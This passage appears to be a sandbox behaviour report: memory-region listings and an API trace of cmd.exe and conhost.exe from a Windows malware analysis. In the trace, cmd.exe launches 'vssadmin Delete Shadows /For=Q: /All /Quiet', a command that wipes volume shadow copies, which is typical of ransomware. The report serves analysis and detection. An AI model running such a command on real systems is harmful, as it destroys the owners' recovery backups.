	        start_va = 0x47c0000
	          end_va = 0x48bffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000047c0000"
	        filename = ""

Region:
	              id = 3039
	        start_va = 0x76820000
	          end_va = 0x768ddfff
	       monitored = 0
	     entry_point = 0x76855630
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")

Region:
	              id = 3040
	        start_va = 0x1c0000
	          end_va = 0x1fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 3041
	        start_va = 0x260000
	          end_va = 0x26ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000260000"
	        filename = ""

Region:
	              id = 3042
	        start_va = 0x46c0000
	          end_va = 0x47bffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000046c0000"
	        filename = ""

Region:
	              id = 3044
	        start_va = 0x2e0000
	          end_va = 0x2e3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000002e0000"
	        filename = ""

Region:
	              id = 3045
	        start_va = 0x48c0000
	          end_va = 0x4a8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000048c0000"
	        filename = ""

Region:
	              id = 3064
	        start_va = 0x4350000
	          end_va = 0x4353fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004350000"
	        filename = ""

Region:
	              id = 3091
	        start_va = 0x4a90000
	          end_va = 0x4dc6fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")


Thread:
	id = 123
	os_tid = 0x870

	[0256.142] GetProcAddress (hModule=0x76d90000, lpProcName="SetConsoleInputExeNameW") returned 0x746ab440
	[0256.143] GetProcessHeap () returned 0x47c0000
	[0256.143] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0x8, Size=0x400a) returned 0x47cb998
	[0256.143] GetProcessHeap () returned 0x47c0000
	[0256.144] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47cb998) returned 1
	[0256.146] _wcsicmp (_String1="vssadmin", _String2=")") returned 77
	[0256.146] _wcsicmp (_String1="FOR", _String2="vssadmin") returned -16
	[0256.146] _wcsicmp (_String1="FOR/?", _String2="vssadmin") returned -16
	[0256.146] _wcsicmp (_String1="IF", _String2="vssadmin") returned -13
	[0256.146] _wcsicmp (_String1="IF/?", _String2="vssadmin") returned -13
	[0256.146] _wcsicmp (_String1="REM", _String2="vssadmin") returned -4
	[0256.146] _wcsicmp (_String1="REM/?", _String2="vssadmin") returned -4
	[0256.146] GetProcessHeap () returned 0x47c0000
	[0256.146] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0x8, Size=0x58) returned 0x47c9048
	[0256.146] GetProcessHeap () returned 0x47c0000
	[0256.147] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0x8, Size=0x1a) returned 0x47c7318
	[0256.149] GetProcessHeap () returned 0x47c0000
	[0256.149] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0x8, Size=0x52) returned 0x47c90a8
	[0256.151] GetConsoleTitleW (in: lpConsoleTitle=0x18f478, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0256.257] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18
	[0256.257] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17
	[0256.257] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18
	[0256.257] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2
	[0256.257] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19
	[0256.257] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19
	[0256.257] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19
	[0256.257] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4
	[0256.258] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4
	[0256.258] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17
	[0256.258] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3
	[0256.258] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6
	[0256.258] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18
	[0256.258] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2
	[0256.258] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6
	[0256.258] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9
	[0256.258] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9
	[0256.258] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4
	[0256.258] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4
	[0256.258] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6
	[0256.258] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15
	[0256.259] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3
	[0256.259] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19
	[0256.259] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19
	[0256.259] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14
	[0256.259] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14
	[0256.259] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4
	[0256.259] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17
	[0256.259] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3
	[0256.259] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17
	[0256.259] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2
	[0256.259] _wcsicmp (_String1="vssadmin", _String2="START") returned 3
	[0256.259] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18
	[0256.259] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11
	[0256.260] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9
	[0256.260] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6
	[0256.260] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6
	[0256.260] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21
	[0256.260] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16
	[0256.260] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20
	[0256.260] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19
	[0256.260] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9
	[0256.260] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18
	[0256.260] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17
	[0256.260] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18
	[0256.260] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2
	[0256.260] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19
	[0256.260] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19
	[0256.261] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19
	[0256.261] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4
	[0256.261] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4
	[0256.261] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17
	[0256.261] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3
	[0256.261] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6
	[0256.261] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18
	[0256.261] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2
	[0256.261] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6
	[0256.261] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9
	[0256.262] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9
	[0256.262] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4
	[0256.262] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4
	[0256.262] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6
	[0256.262] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15
	[0256.262] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3
	[0256.262] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19
	[0256.262] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19
	[0256.262] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14
	[0256.263] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14
	[0256.263] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4
	[0256.263] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17
	[0256.263] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3
	[0256.263] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17
	[0256.263] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2
	[0256.263] _wcsicmp (_String1="vssadmin", _String2="START") returned 3
	[0256.263] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18
	[0256.263] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11
	[0256.263] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9
	[0256.263] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6
	[0256.263] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6
	[0256.264] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21
	[0256.264] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16
	[0256.264] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20
	[0256.264] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19
	[0256.264] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9
	[0256.264] _wcsicmp (_String1="vssadmin", _String2="FOR") returned 16
	[0256.264] _wcsicmp (_String1="vssadmin", _String2="IF") returned 13
	[0256.264] _wcsicmp (_String1="vssadmin", _String2="REM") returned 4
	[0256.266] GetProcessHeap () returned 0x47c0000
	[0256.266] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0x8, Size=0x210) returned 0x47c9108
	[0256.266] GetProcessHeap () returned 0x47c0000
	[0256.266] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0x8, Size=0x64) returned 0x47c9320
	[0256.266] _wcsnicmp (_String1="vssa", _String2="cmd ", _MaxCount=0x4) returned 19
	[0256.267] GetProcessHeap () returned 0x47c0000
	[0256.267] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0x8, Size=0x418) returned 0x47c05c8
	[0256.267] SetErrorMode (uMode=0x0) returned 0x0
	[0256.267] SetErrorMode (uMode=0x1) returned 0x0
	[0256.267] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x47c05d0, lpFilePart=0x18ef84 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x18ef84*="Desktop") returned 0x1d
	[0256.268] SetErrorMode (uMode=0x0) returned 0x1
	[0256.268] GetProcessHeap () returned 0x47c0000
	[0256.268] RtlReAllocateHeap (Heap=0x47c0000, Flags=0x0, Ptr=0x47c05c8, Size=0x56) returned 0x47c05c8
	[0256.268] GetProcessHeap () returned 0x47c0000
	[0256.268] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c05c8) returned 0x56
	[0256.268] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x31f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x9c
	[0256.269] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0256.269] GetProcessHeap () returned 0x47c0000
	[0256.269] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0x8, Size=0x182) returned 0x47c9390
	[0256.269] GetProcessHeap () returned 0x47c0000
	[0256.269] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0x8, Size=0x2fc) returned 0x47c0628
	[0256.379] GetProcessHeap () returned 0x47c0000
	[0256.379] RtlReAllocateHeap (Heap=0x47c0000, Flags=0x0, Ptr=0x47c0628, Size=0x184) returned 0x47c0628
	[0256.379] GetProcessHeap () returned 0x47c0000
	[0256.379] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c0628) returned 0x184
	[0256.379] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x31f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35
	[0256.379] GetProcessHeap () returned 0x47c0000
	[0256.379] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0x8, Size=0xe0) returned 0x47c9520
	[0256.385] GetProcessHeap () returned 0x47c0000
	[0256.385] RtlReAllocateHeap (Heap=0x47c0000, Flags=0x0, Ptr=0x47c9520, Size=0x76) returned 0x47c9520
	[0256.385] GetProcessHeap () returned 0x47c0000
	[0256.385] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c9520) returned 0x76
	[0256.386] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0256.389] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\vssadmin.*" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x18ed10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ed10) returned 0xffffffff
	[0256.390] GetLastError () returned 0x2
	[0256.390] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0256.390] FindFirstFileExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\vssadmin.*" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x18ed10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ed10) returned 0xffffffff
	[0256.391] GetLastError () returned 0x2
	[0256.391] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0256.391] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*" (normalized: "c:\\windows\\syswow64\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x18ed10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ed10) returned 0x47c95a0
	[0256.392] GetProcessHeap () returned 0x47c0000
	[0256.392] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0x0, Size=0x14) returned 0x47c79b0
	[0256.392] FindClose (in: hFindFile=0x47c95a0 | out: hFindFile=0x47c95a0) returned 1
	[0256.392] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM" (normalized: "c:\\windows\\syswow64\\vssadmin.com"), fInfoLevelId=0x1, lpFindFileData=0x18ed10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ed10) returned 0xffffffff
	[0256.392] GetLastError () returned 0x2
	[0256.392] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE" (normalized: "c:\\windows\\syswow64\\vssadmin.exe"), fInfoLevelId=0x1, lpFindFileData=0x18ed10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ed10) returned 0x47c95a0
	[0256.393] GetProcessHeap () returned 0x47c0000
	[0256.393] RtlReAllocateHeap (Heap=0x47c0000, Flags=0x0, Ptr=0x47c79b0, Size=0x4) returned 0x47c7520
	[0256.393] FindClose (in: hFindFile=0x47c95a0 | out: hFindFile=0x47c95a0) returned 1
	[0256.393] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
	[0256.393] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
	[0256.393] GetConsoleTitleW (in: lpConsoleTitle=0x18f204, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0256.542] InitializeProcThreadAttributeList (in: lpAttributeList=0x18f130, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18f114 | out: lpAttributeList=0x18f130, lpSize=0x18f114) returned 1
	[0256.542] UpdateProcThreadAttribute (in: lpAttributeList=0x18f130, dwFlags=0x0, Attribute=0x60001, lpValue=0x18f11c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18f130, lpPreviousValue=0x0) returned 1
	[0256.542] GetStartupInfoW (in: lpStartupInfo=0x18f168 | out: lpStartupInfo=0x18f168*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) 
	[0256.543] GetProcessHeap () returned 0x47c0000
	[0256.543] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0x8, Size=0x18) returned 0x47c7c10
	[0256.543] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38
	[0256.543] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2
	[0256.544] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2
	[0256.544] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0256.544] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0256.544] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0256.544] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3
	[0256.544] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3
	[0256.544] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3
	[0256.544] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3
	[0256.544] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5
	[0256.544] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5
	[0256.544] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9
	[0256.544] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9
	[0256.544] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11
	[0256.544] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12
	[0256.545] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13
	[0256.545] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13
	[0256.545] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0256.545] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0256.545] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0256.545] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0256.545] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0256.545] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0256.545] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0256.545] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0256.545] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0256.545] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13
	[0256.545] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13
	[0256.545] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13
	[0256.545] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16
	[0256.546] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16
	[0256.546] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17
	[0256.546] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17
	[0256.546] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0256.546] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0256.546] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18
	[0256.546] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18
	[0256.546] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20
	[0256.546] GetProcessHeap () returned 0x47c0000
	[0256.546] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c7c10) returned 1
	[0256.546] GetProcessHeap () returned 0x47c0000
	[0256.546] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0x8, Size=0xa) returned 0x47c7530
	[0256.547] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1
	[0256.550] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin  Delete Shadows /For=Q: /All /Quiet ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x18f0b8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin  Delete Shadows /For=Q: /All /Quiet ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f104 | out: lpCommandLine="vssadmin  Delete Shadows /For=Q: /All /Quiet ", lpProcessInformation=0x18f104*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xc48, dwThreadId=0xc4c)) returned 1
	[0256.572] CloseHandle (hObject=0xa4) returned 1
	[0256.573] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0256.573] GetProcessHeap () returned 0x47c0000
	[0256.573] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47cadf0) returned 1
	[0256.573] GetEnvironmentStringsW () returned 0x47ca248*
	[0256.573] GetProcessHeap () returned 0x47c0000
	[0256.573] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0x8, Size=0xb9c) returned 0x47cadf0
	[0256.573] memcpy (in: _Dst=0x47cadf0, _Src=0x47ca248, _Size=0xb9c | out: _Dst=0x47cadf0) returned 0x47cadf0
	[0256.573] FreeEnvironmentStringsA (penv="=") returned 1
	[0256.573] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0
	[0270.913] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x18f09c | out: lpExitCode=0x18f09c*=0x2) returned 1
	[0270.914] CloseHandle (hObject=0xa8) returned 1
	[0270.915] _vsnwprintf (in: _Buffer=0x18f184, _BufferCount=0x13, _Format="%08X", _ArgList=0x18f0a4 | out: _Buffer="00000002") returned 8
	[0270.916] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1
	[0270.917] GetProcessHeap () returned 0x47c0000
	[0270.917] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47cadf0) returned 1
	[0270.917] GetEnvironmentStringsW () returned 0x47ca248*
	[0270.917] GetProcessHeap () returned 0x47c0000
	[0270.917] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0x8, Size=0xbc2) returned 0x47cc568
	[0270.918] memcpy (in: _Dst=0x47cc568, _Src=0x47ca248, _Size=0xbc2 | out: _Dst=0x47cc568) returned 0x47cc568
	[0270.918] FreeEnvironmentStringsA (penv="=") returned 1
	[0270.918] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1
	[0270.918] GetProcessHeap () returned 0x47c0000
	[0270.918] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47cc568) returned 1
	[0270.918] GetEnvironmentStringsW () returned 0x47ca248*
	[0270.918] GetProcessHeap () returned 0x47c0000
	[0270.918] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0x8, Size=0xbc2) returned 0x47cc568
	[0270.919] memcpy (in: _Dst=0x47cc568, _Src=0x47ca248, _Size=0xbc2 | out: _Dst=0x47cc568) returned 0x47cc568
	[0270.919] FreeEnvironmentStringsA (penv="=") returned 1
	[0270.919] GetProcessHeap () returned 0x47c0000
	[0270.919] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c7530) returned 1
	[0270.919] DeleteProcThreadAttributeList (in: lpAttributeList=0x18f130 | out: lpAttributeList=0x18f130) 
	[0270.919] _get_osfhandle (_FileHandle=1) returned 0x3c
	[0270.919] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1
	[0271.039] _get_osfhandle (_FileHandle=1) returned 0x3c
	[0271.039] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x31f40c | out: lpMode=0x31f40c) returned 1
	[0271.275] _get_osfhandle (_FileHandle=0) returned 0x38
	[0271.275] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x31f408 | out: lpMode=0x31f408) returned 1
	[0271.760] SetConsoleInputExeNameW () returned 0x1
	[0271.760] GetConsoleOutputCP () returned 0x1b5
	[0272.068] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x31f460 | out: lpCPInfo=0x31f460) returned 1
	[0272.068] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0272.202] exit (_Code=2) 

Thread:
	id = 246
	os_tid = 0xc24


Process:
	id = "36"
	image_name = "conhost.exe"
	filename = "c:\\windows\\system32\\conhost.exe"
	page_root = "0x51262000"
	os_pid = "0x530"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "35"
	os_parent_pid = "0xab4"
	cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1"
	cur_dir = "C:\\Windows"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 2512
	        start_va = 0x34c00000
	          end_va = 0x34dfffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000034c00000"
	        filename = ""

Region:
	              id = 2513
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 2514
	        start_va = 0x3074ad0000
	          end_va = 0x3074b0ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000003074ad0000"
	        filename = ""

Region:
	              id = 2515
	        start_va = 0x3074c00000
	          end_va = 0x3074dfffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000003074c00000"
	        filename = ""

Region:
	              id = 2516
	        start_va = 0x1b9b46c0000
	          end_va = 0x1b9b46dffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001b9b46c0000"
	        filename = ""

Region:
	              id = 2517
	        start_va = 0x1b9b46e0000
	          end_va = 0x1b9b46f4fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001b9b46e0000"
	        filename = ""

Region:
	              id = 2518
	        start_va = 0x7df5ffe80000
	          end_va = 0x7ff5ffe7ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df5ffe80000"
	        filename = ""

Region:
	              id = 2519
	        start_va = 0x7ff7ff5a0000
	          end_va = 0x7ff7ff5c2fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff7ff5a0000"
	        filename = ""

Region:
	              id = 2520
	        start_va = 0x7ff7ffcf0000
	          end_va = 0x7ff7ffd00fff
	       monitored = 0
